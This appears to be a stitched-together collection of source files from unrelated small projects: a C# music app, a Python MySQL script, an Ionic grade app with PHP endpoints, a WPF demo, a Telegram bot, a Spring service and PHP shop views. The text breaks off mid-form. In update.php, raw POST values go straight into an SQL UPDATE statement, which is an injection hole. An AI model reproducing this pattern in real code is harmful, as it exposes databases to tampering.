public string FilePath { get; private set; }
public string Title { get; set; }
public string Artist { get; set; }
public string Album { get; set; }
public string Genre { get; set; }
public uint TrackNumber { get; set; }
public Song(string filePath)
{
this.FilePath = filePath;
}
public Song(string filePath, MusicProperties musicProperties)
{
this.FilePath = filePath;
this.Update(musicProperties);
}
public void Update(MusicProperties musicProperties)
{
this.Title = musicProperties.Title;
this.Artist = musicProperties.Artist;
this.Album = musicProperties.Album;
// Guard the indexer; some files carry no genre tag
this.Genre = musicProperties.Genre.Count > 0 ? musicProperties.Genre[0] : string.Empty;
this.TrackNumber = musicProperties.TrackNumber;
}
public async Task UpdateAsync()
{
var sf = await StorageFile.GetFileFromPathAsync(this.FilePath);
var mp = await sf.Properties.GetMusicPropertiesAsync();
this.Update(mp);
}
public override bool Equals(object obj)
{
var that = obj as Song;
if (that == null)
return false;
return this.FilePath.Equals(that.FilePath);
}
public override int GetHashCode()
{
return this.FilePath.GetHashCode();
}
}
}
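/* Note on the overrides above: two Songs are equal when they share a FilePath, even if
   their tags differ. This is what lets Library.UpdateSongsAsync() use Songs.Contains(...)
   to detect already-known files. Illustrative (hypothetical paths):

       new Song(@"C:\Music\a.mp3").Equals(new Song(@"C:\Music\a.mp3"))   // true
*/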
<file_sep>/MusicPlus/AppContainer.xaml.cs
using Windows.UI.Xaml.Controls;
using Windows.UI.Xaml.Navigation;
// The Blank Page item template is documented at http://go.microsoft.com/fwlink/?LinkId=234238
namespace MusicPlus
{
/// <summary>
/// An empty page that can be used on its own or navigated to within a Frame.
/// </summary>
public sealed partial class AppContainer : Page
{
public AppContainer()
{
this.InitializeComponent();
NextButton.DataContext = App.AppCtrl;
}
protected override async void OnNavigatedTo(NavigationEventArgs e)
{
base.OnNavigatedTo(e);
App.AppCtrl.ContainerFrame = this.RootFrame;
App.AppCtrl.AudioPlayer = this.AudioPlayer;
RootFrame.Navigate(typeof(MusicPlus.Views.GridView));
await App.AppCtrl.InitializeLibraryViewModelAsync();
}
}
}
<file_sep>/README.md
musicplus
=========
Music Player - Windows Store app
A complete re-write of my previous Windows Store app [Just Music](http://apps.microsoft.com/webpdp/app/37540fe4-92e8-4259-994e-03b126512a4b).
|
42119fa87c59247ab7d33fdfd0432e1b802c89e7
|
[
"Markdown",
"C#"
] | 7
|
C#
|
kyledws/musicplus
|
7e092c6fb4bd9291514e3e66953bf24bd2ddada6
|
ef56940a1a4869e53d1b7e349de58211161f00be
|
refs/heads/master
|
<repo_name>sazelkhokhar1/helloworld<file_sep>/credentials.py
import mysql.connector
import os
mydb = mysql.connector.connect(
host="localhost",
port="3306",
user="root",
passwd="<PASSWORD>"
)
print(mydb)
SQL2 = "CREATE TABLE sys.customers (name VARCHAR(255), id VARCHAR(255))"
SQL3 = "INSERT INTO sys.customers VALUES (%s, %s)"
val = ('abc', '1')  # (name, id), matching the column order declared in SQL2 above
SQL1 = "SELECT * FROM sys.customers"
cursor = mydb.cursor()
#cursor.execute(SQL1)
cursor.execute(SQL3,val)
mydb.commit()
#records = cursor.fetchall()
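# Minimal read-back sketch (assumes the sys.customers table created above exists):
cursor.execute(SQL1)
for (name, cust_id) in cursor.fetchall():
    print(name, cust_id)
cursor.close()
mydb.close()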
|
4fe3b39f77c2c23a6e39022d8dacbdd962a049f6
|
[
"Python"
] | 1
|
Python
|
sazelkhokhar1/helloworld
|
84e137df370fc7c6054873184bbe9cf3c43d3117
|
7d6a197944602b08eecda0788440d42695b5d6e9
|
refs/heads/master
|
<repo_name>rra-am1x-2017/blokcijferapp<file_sep>/src/pages/home/home.ts
import { Component } from '@angular/core';
import { NavController, AlertController } from 'ionic-angular';
import { RapportenProvider } from '../../providers/rapporten/rapporten';
@Component({
selector: 'page-home',
templateUrl: 'home.html'
})
export class HomePage {
public rapporten = [];
constructor(public navCtrl: NavController,
public alertCtrl: AlertController,
public rapportenProvider: RapportenProvider )
{
}
ionViewDidLoad() {
this.rapportenProvider.getRapporten()
.subscribe((data: any[]) => {
this.rapporten = data;
console.log(this.rapporten[1]);
});
}
public changeGradeAlert(rapport, data, grade, vak) {
console.log(data);
let addTodoAlert = this.alertCtrl.create({
title: "<p>Student: " + rapport.firstname + "</p>" +
"<p>Vak: " + vak + " </p>" +
"<p>Periode: " + data.period + "</p>" +
"<p>Cijfer: " + grade + "</p>",
message: "Voer een nieuw cijfer in",
inputs: [
{
type: "number",
name: "nameNewGrade"
}
],
buttons: [
{
text: "Cancel"
},
{
text: "Voeg toe",
handler: (inputData) => {
let newGrade = inputData.nameNewGrade;
this.rapportenProvider.addRapporten(newGrade, data.period, rapport.id, vak);
this.navCtrl.push(HomePage);
}
}
],
cssClass: 'cssCustom'
});
addTodoAlert.present();
}
public gradeCol(grade: number | string): string {
if (typeof(grade) == 'number') {
return grade >= 5.5 ? 'row grade-vol': 'row grade-onv';
}
else if (typeof(grade) == 'string')
if ((grade == 'V') || (grade == 'G')) {
return 'row grade-vol';
} else {
return 'row grade-onv';
}
return 'row';
}
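// Illustrative template binding for gradeCol (home.html is not shown here, so this usage is an assumption):
//   <ion-row [ngClass]="gradeCol(data.web)"> ... </ion-row>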
public calculateBlokGrade(data: any): string {
let total : number = 0;
let max : number = 0;
for (let key of Object.keys(data.som)) {
max += data.som[key];
if ( data[key] >= 5.5 )
{
total += data.som[key];
}
}
// console.log((data.cesure["g"]/100) * max);
// console.log((data.cesure["v"]/100) * max);
// return total;
if ( total >= (data.cesure["g"]/100) * max) {
return "G";
} else if ( total >= (data.cesure["v"]/100) * max) {
return "V";
} else {
return "O";
}
}
public age(date){
let now = new Date();
let bday = new Date(date);
// Only count the current year once the birthday has passed;
// the old month/day check miscounted e.g. a later month with an earlier day
let hadBirthdayThisYear = (now.getMonth() > bday.getMonth()) ||
(now.getMonth() === bday.getMonth() && now.getDate() >= bday.getDate());
let years = now.getFullYear() - bday.getFullYear();
return hadBirthdayThisYear ? years : years - 1;
}
// Exposed for use outside the class; otherwise the tooling flags it as never used
public refresh() {
this.navCtrl.push(HomePage);
}
}
<file_sep>/src/assets/update.php
<?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include("connect_db.php");
$query = "UPDATE `grades`
SET `" . $_POST["vak"] . "` = '" . $_POST["newGrade"] . "'
WHERE `grades`.`period` = " . $_POST["period"] . "
AND `grades`.`user_id` = " . $_POST["id"] . ";";
$result = mysqli_query($conn, $query);
echo json_encode($_POST);
?><file_sep>/src/assets/connect_db.php
<?php
// ********************** localhost login credentials ***************************
// Credentials the code uses to connect to the MySQL database
define("SERVER_NAME", "localhost");
define("USER_NAME", "root");
define("PASSWORD", "");
define("DATABASE_NAME", "am1x-ionic");
// define("SERVER_NAME", "rra-am1x-2017.stateu.org");
// define("USER_NAME", "djmthqwf_rra");
// define("PASSWORD", "<PASSWORD>");
// define("DATABASE_NAME", "djmthqwf_app");
// This function opens the connection to the MySQL server
$conn = mysqli_connect(SERVER_NAME, USER_NAME, PASSWORD, DATABASE_NAME) or die("Database connection failed");
// *****************************************************************************
?><file_sep>/src/assets/grades.php
<?php
header('Access-Control-Allow-Origin: *');
header('Content-Type: application/json');
include("connect_db.php");
$query = "SELECT `residence`,
`absence`,
`birthday`,
`grades`.`period`,
`users`.`id`,
`user_id`,
`firstname`,
`infix`,
`lastname`,
`photo`,
CONCAT('[', GROUP_CONCAT('{ ',
'\"period\"', ': ', `grades`.`period` , ', ',
'\"web\"', ': ', web, ', ',
'\"game\"', ': ', game, ', ',
'\"slb\"', ': ', slb, ', ',
'\"ned\"', ': ', ned, ', ',
'\"eng\"', ': ', eng, ', ',
'\"rek\"', ': ', rek, ', ',
'\"proj\"', ': ', proj, ', ',
'\"data\"', ': ', data, ', ',
'\"som\"', ': ', `courseweight`.`weight`, ', ',
'\"cesure\"', ': ', `courseweight`.`cesure`, ' }' ORDER BY `grades`.`period`), ']') AS `period`
FROM `grades`, `users`, `courseweight`
WHERE `grades`.`user_id` = `users`.`id`
AND `courseweight`.`period` = `grades`.`period`
GROUP BY `grades`.`user_id`
ORDER BY `grades`.`id` ASC";
// $query = "SELECT `residence`,
// `absence`,
// `birthday`,
// `grades`.`period`,
// `users`.`id`,
// `user_id`,
// `firstname`,
// `infix`,
// `lastname`,
// `photo`,
// CONCAT('[', GROUP_CONCAT('{ ',
// '\"period\"', ': ', period, ', ',
// '\"web\"', ': ', web, ', ',
// '\"game\"', ': ', game, ', ',
// '\"slb\"', ': ', slb, ', ',
// '\"ned\"', ': ', ned, ', ',
// '\"eng\"', ': ', eng, ', ',
// '\"rek\"', ': ', rek, ', ',
// '\"proj\"', ': ', proj, ', ',
// '\"data\"', ': ', datab, ', ',
// '\"blok\"', ': \"', blok, '\" }' ORDER BY `period`), ']') AS `period`
// FROM `grades`, `users`
// WHERE `grades`.`user_id` = `users`.`id`
// GROUP BY `grades`.`user_id`
// ORDER BY `grades`.`id` ASC";
$result = mysqli_query($conn, $query);
$record = mysqli_fetch_all($result, MYSQLI_ASSOC);
for ($i = 0; $i < sizeof($record); $i++) {
$record[$i]["period"] = json_decode($record[$i]["period"]);
}
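// Shape of one decoded "period" entry after the loop above (illustrative values, not real data):
// { "period": 1, "web": 7, "game": 6, ..., "som": {"web": 10, ...}, "cesure": {"v": 55, "g": 80} }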
echo json_encode( $record);
?>
<file_sep>/src/providers/rapporten/rapporten.ts
import { HttpClient, HttpParams, HttpHeaders } from '@angular/common/http';
import { Injectable } from '@angular/core';
@Injectable()
export class RapportenProvider {
private urlUpdate = 'http://blokcijferapp.nl/update.php'
private url = 'http://blokcijferapp.nl/grades.php'
// private url = 'http://rra-am1x-2017.stateu.org/assets/grades.php'
constructor(public http: HttpClient) {
}
public getRapporten() {
return this.http.get(this.url, {responseType: "json"});
}
public addRapporten(newGrade, period, id, vak) {
let params = new HttpParams();
params = params.set('newGrade', newGrade);
params = params.set('period', period);
params = params.set('id', id);
params = params.set('vak', vak);
console.log(params);
let headers = new HttpHeaders();
headers = headers.append('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
this.http.post(this.urlUpdate,
params,
{headers: headers, responseType: "json"}).subscribe(data => {
});
}
}
|
0e7152d3cc9c490af36543cbd95477122a577e60
|
[
"TypeScript",
"PHP"
] | 5
|
TypeScript
|
rra-am1x-2017/blokcijferapp
|
c066907dedaef8077fbfc7db4da310d0a3f93cba
|
2680a0b1bc213d582915510392c3d885b9d8ddb4
|
refs/heads/master
|
<file_sep># Use an official java runtime as a parent image
FROM openjdk:8-jdk
COPY friend.management-1.0-SNAPSHOT.jar /home/friend.management-1.0-SNAPSHOT.jar
# Make port 8080 available to the world outside this container
EXPOSE 8080
# Run friend management when the container launches
CMD ["java", "-jar", "/home/friend.management-1.0-SNAPSHOT.jar"]
<file_sep>version: "3"
services:
web:
image: yaserwang/friend-management:1.0
ports:
- "8080:8080"<file_sep># friend_management
Uses Spring Boot to quickly create the service via its auto-configuration.
Uses Swagger to generate and expose the documentation of the API.
The API can be viewed via the link below when starting the service locally:
http://localhost:8080/swagger-ui.html
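A quick way to bring the service up with the compose file in this repo (assumes Docker and Docker Compose are installed):

    docker-compose up -d

Then open the Swagger UI link above.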
# Note
Users need to be added in order to pass the validation.
Below are pre-existing users for easy testing:
<EMAIL>
<EMAIL>
<EMAIL>
<EMAIL>
<EMAIL><file_sep>package com.sp.pojo;
import com.fasterxml.jackson.annotation.JsonInclude;
import java.util.Objects;
import java.util.Set;
@JsonInclude(JsonInclude.Include.NON_NULL)
public class PublishResponse {
private boolean success;
private Set<String> recipients;
private String message;
private PublishResponse() { }
public PublishResponse(boolean success, Set<String> recipients) {
this(success, recipients, null);
}
public PublishResponse(boolean success, String message) {
this(success, null, message);
}
public PublishResponse(boolean success, Set<String> recipients, String message) {
this.success = success;
this.recipients = recipients;
this.message = message;
}
public boolean isSuccess() {
return success;
}
public Set<String> getRecipients() {
return recipients;
}
public String getMessage() {
return message;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
PublishResponse that = (PublishResponse) o;
return success == that.success &&
Objects.equals(recipients, that.recipients) &&
Objects.equals(message, that.message);
}
@Override
public int hashCode() {
return Objects.hash(success, recipients, message);
}
@Override
public String toString() {
return "PublishResponse{" +
"success=" + success +
", recipients=" + recipients +
", message='" + message + '\'' +
'}';
}
}
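// Illustrative Jackson output for the NON_NULL annotation above (assumes default serialization):
//   new PublishResponse(true, recipients)       -> {"success":true,"recipients":[...]}
//   new PublishResponse(false, "not connected") -> {"success":false,"message":"not connected"}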
<file_sep>package com.sp.pojo;
public class SubscribeRequest {
private String requestor;
private String target;
private SubscribeRequest() {
}
public SubscribeRequest(String requestor, String target) {
this.requestor = requestor;
this.target = target;
}
public String getRequestor() {
return requestor;
}
public String getTarget() {
return target;
}
}
|
a4646e4e42cae127ab47962c66b683223b0272db
|
[
"Markdown",
"Java",
"Dockerfile",
"YAML"
] | 5
|
Dockerfile
|
yaserwang/friend_management
|
d24dc0b653e79afbcd5461d0b870670ea57cdf5a
|
1eb26e82a52c518b99cfd743ee265c303609697b
|
refs/heads/master
|
<file_sep>import React from 'react';
import { Link } from 'react-router-dom';
import "./Header.css";
import SearchIcon from '@material-ui/icons/Search';
import LocalMallOutlinedIcon from '@material-ui/icons/LocalMallOutlined';
import { useStateValue } from './StateProvider';
import AccountCircleOutlinedIcon from '@material-ui/icons/AccountCircleOutlined';
function Header() {
const [{ basket }] = useStateValue();
console.log(basket);
return <nav className="header">
<Link to="/">
<img className="header__logo" src="/images/assets/logo.jpg" alt="" />
</Link>
{/* <div className="header__search">
<input type="text" className="header__searchInput" />
<SearchIcon className="header__searchIcon" />
</div> */}
<div className="header__nav">
<div className="header__link1">
<Link to="/Login" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">WHAT'S NEW</span>
</div>
</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">SALES</span>
</div>
</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">CATEGORIES</span>
</div>
</Link>
<Link to="/" className="header__link">
<div className="header__option">
<span className="header__optionLineTwo">CONTACT US</span>
</div>
</Link>
</div>
<div className="header__link2">
<Link to="/checkout" className="header__link">
<span>
<SearchIcon/>
</span>
</Link>
<Link to="/checkout" className="header__link">
<div className="header__optionBasket">
<span>
<AccountCircleOutlinedIcon/>
</span>
</div>
</Link>
<Link to="/checkout" className="header__link">
<div className="header__optionBasket">
<span>
<LocalMallOutlinedIcon />
</span>
<span className="header_optionLineTwo header_basketCount">{basket?.length}</span>
</div>
</Link>
</div>
</div>
</nav>
}
export default Header
|
294bde1941b2522ef8dd22ab905e25f2dbb2b862
|
[
"JavaScript"
] | 1
|
JavaScript
|
haziqothman/HHD-tech
|
c77ba5a11adce252fc7e9eb60d9c6925a9abb803
|
16cfd014803eec402b41f6a72e1e1430c4ed0640
|
refs/heads/master
|
<file_sep>using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace WpfApp2
{
public class MessageViewModel : INotifyPropertyChanged
{
private string _contenu;
public string Contenu
{
get { return _contenu; }
set
{
_contenu = value;
OnPropertyChanged("Contenu");
}
}
private string _emetteur;
public string Emetteur
{
get { return _emetteur; }
set
{
_emetteur = value;
OnPropertyChanged("Emetteur");
}
}
private DateTime _date;
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string name)
{
PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(name));
}
public DateTime Date
{
get { return _date; }
set
{
_date = value;
OnPropertyChanged("Date");
}
}
public override string ToString()
{
return $"{Contenu} {Emetteur} {Date}";
}
}
}
<file_sep>using System;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.ComponentModel;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Input;
namespace WpfApp2
{
public class MyViewModel : INotifyPropertyChanged
{
public event PropertyChangedEventHandler PropertyChanged;
protected void OnPropertyChanged(string name)
{
PropertyChanged?.Invoke(this, new PropertyChangedEventArgs(name));
}
#region WPF_listes_et_controles
public int Index { get; set; }
public ObservableCollection<string> Valeurs { get; set; } = new ObservableCollection<string> { "Heeeeee", "Haaaaa" };
private string _test = "Hello !";
public string Test
{
get { return _test; }
set
{
_test = value;
OnPropertyChanged(nameof(Test)); // Notify the view that the "Test" property changed
}
}
public ICommand EditInput
{
get
{
return new RelayCommand(param =>
{
Test = "Test";
});
}
}
public ICommand EditList
{
get
{
return new RelayCommand(param =>
{
Valeurs.Add(Test);
});
}
}
public ICommand DeleteElementList
{
get
{
return new RelayCommand(
execute: param => Valeurs.RemoveAt(0),
canExecute: param => Valeurs.Count() > 0
);
}
}
public ICommand UpdateList
{
get
{
return new RelayCommand(param =>
{
if (Valeurs.Contains(Test))
Valeurs.Remove(Test);
else
Valeurs.Add(Test);
});
}
}
public ObservableCollection<MessageViewModel> Messages { get; set; } = new ObservableCollection<MessageViewModel> { new MessageViewModel { Contenu = "Contenu 1", Date = DateTime.Now.AddDays(10), Emetteur = "Emmetteur1" } };
public ICommand AddMessage
{
get
{
return new RelayCommand(param =>
{
Messages.Add(new MessageViewModel { Contenu = "Contenu1", Emetteur = "Emetteur1", Date = DateTime.Now });
});
}
}
public ICommand ModifyMessage
{
get
{
return new RelayCommand(
execute: param => Messages[selectedIndex].Contenu = "Contenu_modified",
canExecute: param => Messages.Count() > 0
);
}
}
public ICommand DeleteFirstMessage
{
get
{
return new RelayCommand(
execute: param => Messages.RemoveAt(0),
canExecute: param => Messages.Count() > 0
);
}
}
private int selectedIndex;
public int SelectedIndex
{
get { return selectedIndex; }
set
{
selectedIndex = value;
OnPropertyChanged(nameof(SelectedIndex));
}
}
public ICommand DeleteSelectedMessage
{
get
{
return new RelayCommand(
execute: param => Messages.RemoveAt(SelectedIndex),
canExecute: param => Messages.Count() > 0
);
}
}
public ICommand RemoveThisMessage
{
get
{
return new RelayCommand(
execute: param => Messages.Remove((MessageViewModel)param)
);
}
}
public ObservableCollection<string> ListeImages { get; set; } = new ObservableCollection<string> { "/Images/image1.jpg", "/Images/image2.jpg", "/Images/image3.jpg", "image4.jpg" };
#endregion
#region Cas_Pratiques_MVVM
private int _compteur;
public int Compteur
{
get { return _compteur; }
set
{
_compteur = value;
OnPropertyChanged(nameof(Compteur));
}
}
public ICommand Augmenter
{
get
{
return new RelayCommand(param =>
{
Compteur++;
});
}
}
public ICommand Diminuer
{
get
{
return new RelayCommand(param =>
{
Compteur--;
});
}
}
public ICommand Reinitialiser
{
get
{
return new RelayCommand(param =>
{
Compteur = 0;
});
}
}
public ICommand GenericModify
{
get
{
return new RelayCommand(param =>
{
if (param.ToString() == "add")
Compteur++;
else if (param.ToString() == "del")
Compteur--;
else if (param.ToString() == "reset")
Compteur = 0;
else
throw new Exception();
});
}
}
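// Illustrative XAML for the parameterized command above (the view is not shown here, so this binding is an assumption):
//   <Button Content="+" Command="{Binding GenericModify}" CommandParameter="add"/>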
#endregion
}
}
|
2beecf9d47e5f4a3dee329ed14e56c37a1c33465
|
[
"C#"
] | 2
|
C#
|
antoine4790/WpfApp
|
6589521f22044dd54bad1e404bfe2a3ea4cb0704
|
ccc1ed20d88f07061fb0eef90a90dfcd3f98f00e
|
refs/heads/master
|
<repo_name>destimon/python-telegram-bot<file_sep>/bot.py
from datetime import datetime
import telebot
from profanity import profanity
from config import config
bot = telebot.TeleBot(config.token)
help_message = "/time - Get actual date\n/word [WORD] - repeat word"
time_message = "The actual time is: " + str(datetime.now())
# Commands Handler
@bot.message_handler(commands=['help'])
def send_help(message):
    bot.reply_to(message, help_message)
@bot.message_handler(commands=['time'])
def send_time(message):
    # Build the timestamp per request; a module-level constant would freeze it at startup
    bot.reply_to(message, "The actual time is: " + str(datetime.now()))
@bot.message_handler(commands=['word'])
def send_word(message):
    # Echo everything after the command as a single string
    bot.reply_to(message, " ".join(message.text.split()[1:]))
# Message Handler
@bot.message_handler(content_types=["text"])
def echo_message(msg):
if profanity.contains_profanity(msg.text):
# Bad Words
bot.send_message(msg.chat.id, "Ew. Don't use words like this!")
elif msg.text.lower() == "hello":
# Greetings
bot.send_message(msg.chat.id, "Hi!")
elif msg.text.lower().find("hello") > 0:
# Suggestions
bot.send_message(msg.chat.id, "You mean 'hello'?\nHello!")
else:
# Handle unexpected
bot.send_message(msg.chat.id, "I don't understand you, sorry.")
if __name__ == '__main__':
print("Start polling...")
print("Token: ", config.token)
bot.polling(none_stop = True)
<file_sep>/README.md
# python-telegram-bot
Just another Telegram bot written in Python.
TODO:
* Message Handler
* Hello response **[DONE]**
* Some bad-words cases response **[DONE]**
* Suggesting **[DONE]**
* Commands
* /help **[DONE]**
* /time **[DONE]**
* /word [WORD] (display word) **[DONE]**
* Keyboard
* Basic Menu
<file_sep>/config/config_sample.py
token = '<PASSWORD> TOKEN'
# Usage:
# import <THIS MODULE> anywhere
# <THIS MODULE>.token is your token variable
|
87bd74593aa8c4c6a3fbea3de32b2c9eccedfa89
|
[
"Markdown",
"Python"
] | 3
|
Python
|
destimon/python-telegram-bot
|
273519a8ea2471bb053c75edaa7532819b0a16b6
|
8e9deea775fc1560f6dcfcd7f157755ad0526fae
|
refs/heads/master
|
<repo_name>hieuthanh1999/StoreHongAn<file_sep>/views/sanphamlienquan/sanphamlienquan.php
<!-- related product area start-->
<div class="related-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2>related products</h2>
</div>
</div>
</div>
<div class="row">
<div class="related-slider">
<?php foreach ($data_sanphamlienquan as $value) : ?>
<div class="col-md-12">
<div class="single-product">
<div class="product-img">
<a href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
</a>
</div>
<div class="list-product-info">
<div class="price-rating">
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
<a href="#" class="review">1 Review(s)</a>
<a href="#" class="add-review">Add Your Review</a>
</div>
</div>
</div>
<div class="product-price">
<div class="product-name">
<a href=""><?php echo $value['tenSP'] ?></a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']) ?> VND</span>
</div>
</div>
</div>
</div>
<?php
endforeach
?>
</div>
</div>
</div>
</div>
<!-- related product area end--><file_sep>/views/thanhtoan/thanhtoan.php
<!-- checkout page -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong> Shopping cart</strong></li>
</ul>
</div>
</div>
</div>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Thanh Toán</h2>
</div>
</div>
</div>
</div>
</div>
<section class="pages checkout section-padding">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="main-input single-cart-form padding60">
<div class="log-title">
<h3><strong>Chi tiết hóa đơn</strong></h3>
</div>
<div class="custom-input">
<form action="?action=hoanthanhdonhang&idUser=<?php echo $data_user['idUser']; ?>" method="post">
<input type="text" name="NguoiNhan" placeholder="<NAME>" required value="<?php echo $data_user['ho'] . ' ' . $data_user['ten']; ?>" />
<input type="email" name="Email" placeholder="Địa chỉ Email.." required value="<?php echo $data_user['email']; ?>" />
<input type="text" name="SDT" placeholder="Số điện thoại.." required pattern="[0-9]+" minlength="10" value="<?php echo $data_user['sodienthoai']; ?>" />
<input type="text" name="DiaChi" placeholder="Đại chỉ giao hàng" required value="<?php echo $data_user['diachi']; ?>" />
<br>
<div class="submit-text">
<button type="submit">Thanh toán</button>
</div>
</form>
</div>
</div>
</div>
<div class="col-xs-12 col-sm-6">
<div class="padding60">
<div class="log-title">
<h3><strong>Hóa đơn</strong></h3>
</div>
<div class="cart-form-text pay-details table-responsive">
<table>
<thead>
<tr>
<th>Sản phẩm</th>
<td>Thành Tiền</td>
</tr>
</thead>
<tbody>
<tr>
<th><?php foreach ($_SESSION['sanpham'] as $key => $value) { ?>
<?php echo $value['tenSP']; ?>
<?php echo "SL: " . $value['soluong'] . '<br>'; ?>
<?php } ?>
</th>
<td>
<?php echo $_SESSION['tongtien'] . '.000 vnd<br>'; ?>
</td>
</tr>
<tr>
<th>Giảm Giá</th> <!-- take the id from the URL, then inner join with the promotions table to get the discount value -->
<td><?php $_SESSION['giatriKM'] = $data_sanpham['giatriKM'];
echo $_SESSION['giatriKM'] . '%'; ?></td>
</tr>
</tbody>
<tfoot>
<tr>
<th>Tổng</th>
<td>
<?php
if ($_SESSION['giatriKM'] != 0) {
$_SESSION['tongtien_KM'] = ($_SESSION['tongtien'] - ($_SESSION['tongtien'] * ($data_sanpham['giatriKM'])) / 100);
echo $_SESSION['tongtien_KM'];
} else {
echo $_SESSION['tongtien'];
}
?>.000 VNĐ
</td>
</tr>
</tfoot>
</table>
</div>
</div>
</div>
</div>
</div>
</section>
</div>
</div><file_sep>/admin/views_admin/sanpham/quanlysanpham.php
<div class="col-md-12">
<div style="margin-bottom:5px;">
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=them_sanpham_giaodien" class="btn btn-primary">Thêm sản phẩm</a>
<?php } ?>
</div>
<div class="panel panel-primary">
<div class="panel-heading">Danh sách Sản Phẩm</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">Mã sản phẩm</th>
<th style="text-align:center;">Tên sản phẩm</th>
<th style="text-align:center;">Giá thành</th>
<th style="text-align:center;">Loại sản phẩm</th>
<th style="text-align:center;">Số lượng</th>
<th style="text-align:center;">Hình ảnh</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
//var_dump($cate);
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++; ?></td>
<td><?= $value['idSP'] ?></td>
<td><?= $value['tenSP'] ?></td>
<td><?= number_format($value['Dongia']); ?></td>
<td>
<?php foreach ($dataCate as $row) {
if ($value['idLoaiSP'] == $row['idLoaiSP']) {
echo $value['idLoaiSP'];
}
} ?>
</td>
<td><?= $value['soluong'] ?>
<br>
<?php if ($value['soluong'] < 10) { ?>
<a class="soluong" href="?action=them_soluong_giaodien&soluong=<?php echo $value['soluong'] ?>&idSP=<?php echo $value['idSP'] ?>"><br>Số lượng nhỏ hơn 10<br></a>
<?php } ?>
</td>
<td>
<img style="width:350px; height:300px" src="./public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
</td>
<td>
<?php if ($_SESSION['admin'] == true) { ?>
<a href="?action=suasanpham&id=<?= $value['idSP'] ?>" type="button" class="btn btn-light">Sửa</a>
<a href="?action=xoasanpham&id=<?= $value['idSP'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa ">
<i class="fa fa-times"></i></a>
<?php } ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<span style="font-size: 20px;">
<?php
if (!isset($timkiem_sp)) {
$tong = ceil($tongsotrang);
for ($i = 1; $i <= $tong; $i++) {
echo '<a href="?action=sanpham&trang=' . $i . '">' . $i . '</a> | ';
}
}
?>
</span>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/views/chitietmathang/chitietmathang.php
<div id="main-content-wp" class="detail-product-page">
<!-- single product area start -->
<div class="Single-product-location home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="?page=home" title="go to homepage">Home<span>/</span></a> </li>
<li><strong><?php echo $data_chitiet['tenSP']; ?></strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<!-- single product area end -->
<!-- single product details start -->
<div class="single-product-details">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="single-product-img tab-content">
<div class="single-pro-main-image tab-pane active" id="pro-large-img-1">
<a href="#">
<img class="optima_zoom" src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh1']; ?>" data-zoom-image="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh1']; ?>">
</a>
</div>
</div>
<div class="product-page-slider">
<div class="single-product-slider">
<a href="#pro-large-img-1" data-toggle="tab">
<img src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh2']; ?>" alt="" class="simpleLens-big-image">
</a>
</div>
<div class="single-product-slider">
<a href="#pro-large-img-1" data-toggle="tab">
<img src="admin/public_admin/image/sanpham/<?php echo $data_chitiet['anh3']; ?>" alt="" class="simpleLens-big-image">
</a>
</div>
</div>
</div>
<div class="col-sm-6">
<div class="single-product-details">
<a href="#" class="product-name"><?php echo $data_chitiet['tenSP']; ?></a>
<div class="list-product-info">
<div class="price-rating">
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
<a href="#" class="review">1 Review(s)</a>
<a href="#" class="add-review">Add Your Review</a>
</div>
</div>
</div>
<div class="avalable">
<p>Availability:<span>
<?php if ($size['soluong'] < 1) {
echo "hết hàng";
} else {
echo "còn hàng";
} ?>
</span></p>
</div>
<div class="item-price">
<span>Sale: <?php echo number_format($data_chitiet['Dongia']); ?> VND</span>
<!-- <span class="price-new" style="text-decoration: line-through;">Giá gốc: <?php echo number_format($product->price); ?> VND</span> -->
<form action="../../cart/index" method="POST">
